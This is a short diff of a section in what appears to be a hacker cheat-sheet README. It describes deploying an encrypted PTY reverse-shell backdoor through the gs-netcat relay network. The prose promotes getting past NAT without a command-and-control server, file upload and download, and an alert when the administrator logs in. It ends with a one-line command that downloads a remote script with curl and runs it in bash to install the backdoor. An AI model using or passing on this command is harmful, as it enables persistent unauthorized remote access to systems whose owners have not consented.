hackerschoice/thc-tips-tricks-hacks-cheat-sheet/README.md

 <a id="reverse-shell-gs-netcat"></a>
 **5.i.a.
 Reverse shell with gs-netcat (encrypted)**

 Use [gsocket deploy](https://gsocket.io/deploy).
-It spawns a fully functioning PTY reverse shell and using the Global Socket Relay network.
-It uses 'password hashes' instead of IP addresses to connect.
-This means that you do not need to run your own Command & Control server for the backdoor to connect back to.
+It spawns a fully functioning PTY reverse shell.
+Both, the YOU and the remote system, can be behind NAT and the traffic is routed via a relay network.
+It also supports file upload/download (Ctrl-e c) and alarms when the admin logs in.
 If netcat is a swiss army knife than gs-netcat is a german battle axe :>

 ```sh
 X=ExampleSecretChangeMe bash -c "$(curl -fsSL https://gsocket.io/x)"